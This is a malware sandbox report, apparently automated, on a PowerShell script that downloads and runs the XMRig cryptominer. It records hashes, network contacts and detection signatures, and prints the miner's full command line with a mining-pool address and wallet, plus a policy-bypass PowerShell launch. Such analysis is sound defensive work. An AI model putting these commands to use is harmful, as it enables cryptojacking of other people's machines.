memory/1992-11-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-12-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-14-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-16-0x00000206782C0000-0x00000206782CA000-memory.dmp

memory/1992-15-0x00000206782E0000-0x00000206782F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4576-47-0x00000270D4090000-0x00000270D40B0000-memory.dmp

memory/4576-48-0x0000027167EF0000-0x0000027167F10000-memory.dmp

memory/1992-49-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

memory/1992-50-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/4576-51-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-54-0x0000027168560000-0x0000027168580000-memory.dmp

memory/4576-53-0x0000027168330000-0x0000027168350000-memory.dmp

memory/4576-52-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/1992-56-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/4576-55-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-57-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-58-0x0000027168330000-0x0000027168350000-memory.dmp

memory/4576-59-0x0000027168560000-0x0000027168580000-memory.dmp

memory/4576-60-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-61-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-62-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-63-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-64-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-65-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-66-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-67-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-68-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-69-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-70-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-71-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-72-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-73-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-74-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-75-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-76-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-77-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-78-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-79-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-80-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-81-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-82-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-83-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-84-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-85-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-86-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-87-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-88-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-89-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-90-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-91-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-92-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-93-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-94-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-95-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-96-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-97-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-98-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-99-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-100-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-101-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-102-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-103-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-104-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-105-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-106-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-107-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-108-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-109-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-110-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-111-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-112-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-113-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-114-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-115-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-116-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-117-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

memory/4576-118-0x00007FF69C9B0000-0x00007FF69D5E3000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4616-0-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4616-6-0x0000021125300000-0x0000021125322000-memory.dmp

memory/4616-9-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-11-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-10-0x000002113DAB0000-0x000002113DB26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yotb1dht.jvu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4616-28-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-51-0x000002113D910000-0x000002113D922000-memory.dmp

memory/4616-64-0x000002113D900000-0x000002113D90A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/380-93-0x00000236E4BE0000-0x00000236E4C00000-memory.dmp

memory/4616-94-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/380-95-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/4616-96-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-97-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/380-98-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-99-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-100-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-101-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-102-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-103-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-104-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-105-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-106-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-107-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-108-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-109-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-110-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-111-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-112-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-113-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-114-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-115-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-116-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-117-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-118-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-119-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-120-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-121-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-122-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-123-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-124-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-125-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-126-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-127-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-128-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-129-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-130-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-131-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-132-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-133-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-134-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-135-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-136-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-137-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-138-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-139-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-140-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-141-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-142-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-143-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-144-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-145-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-146-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-147-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-148-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-149-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-150-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-151-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-152-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-153-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-154-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-155-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-156-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-157-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-158-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

memory/380-159-0x00007FF62AA90000-0x00007FF62B6C3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:52

Platform

win10v2004-20240426-en

Max time kernel

1789s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
NL 23.62.61.186:443 www.bing.com tcp
US 8.8.8.8:53 186.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 23.62.61.186:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp

Files

memory/1592-0-0x00007FF8B9523000-0x00007FF8B9525000-memory.dmp

memory/1592-6-0x0000019271BD0000-0x0000019271BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_melesntd.4n3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1592-11-0x00007FF8B9520000-0x00007FF8B9FE1000-memory.dmp

memory/1592-12-0x00007FF8B9520000-0x00007FF8B9FE1000-memory.dmp

memory/1592-13-0x00007FF8B9520000-0x00007FF8B9FE1000-memory.dmp

memory/1592-14-0x00007FF8B9523000-0x00007FF8B9525000-memory.dmp

memory/1592-16-0x00007FF8B9520000-0x00007FF8B9FE1000-memory.dmp

memory/1592-17-0x0000019271F90000-0x0000019271FA2000-memory.dmp

memory/1592-18-0x0000019271F70000-0x0000019271F7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4268-49-0x000001EA48B20000-0x000001EA48B40000-memory.dmp

memory/4268-50-0x000001EA4A560000-0x000001EA4A580000-memory.dmp

memory/4268-51-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-53-0x000001EA4A580000-0x000001EA4A5A0000-memory.dmp

memory/4268-52-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-54-0x000001EA4A5A0000-0x000001EA4A5C0000-memory.dmp

memory/1592-55-0x00007FF8B9520000-0x00007FF8B9FE1000-memory.dmp

memory/4268-56-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-57-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-58-0x000001EA4A580000-0x000001EA4A5A0000-memory.dmp

memory/4268-59-0x000001EA4A5A0000-0x000001EA4A5C0000-memory.dmp

memory/4268-60-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-61-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-62-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-63-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-64-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-65-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-66-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-67-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-68-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-69-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-70-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-71-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-72-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-73-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-74-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-75-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-76-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-77-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-78-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-79-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-80-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-81-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-82-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-83-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-84-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-85-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-86-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-87-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-88-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-89-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-90-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-91-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-92-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-93-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-94-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-95-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-96-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-97-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-98-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-99-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-100-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-101-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-102-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-103-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-104-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-105-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

memory/4268-106-0x00007FF7C24C0000-0x00007FF7C30F3000-memory.dmp

